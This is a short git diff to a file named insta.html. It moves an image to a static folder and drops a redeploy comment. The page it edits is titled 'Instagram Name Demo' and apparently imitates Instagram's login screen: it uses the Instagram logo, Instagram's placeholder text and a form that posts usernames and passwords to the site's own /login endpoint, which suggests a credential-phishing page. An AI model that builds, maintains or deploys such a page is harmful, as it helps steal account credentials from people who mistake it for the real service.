Move image to static folder and update HTML

--- a/insta.html
+++ b/insta.html
@@ -1,7 +1,6 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <!-- Render redeploy trigger: minor comment added -->
   <meta charset="utf-8" />
   <meta name="viewport" content="width=device-width,initial-scale=1" />
   <title>Instagram Name Demo</title>
@@ -89,7 +88,7 @@
   <div class="wrap">
     <div class="card" role="region" aria-label="Login">
       <!-- Title replaced with image -->
-      <img src="hhh.jpg" alt="Instagram" style="width: 150px; margin-bottom: 20px;">
+      <img src="/static/hhh.jpg" alt="Instagram" style="width: 150px; margin-bottom: 20px;">
 
       <form id="loginForm" autocomplete="on" action="/login" method="post">
         <input type="text" id="username" name="username" placeholder="Phone number, username or email" required>
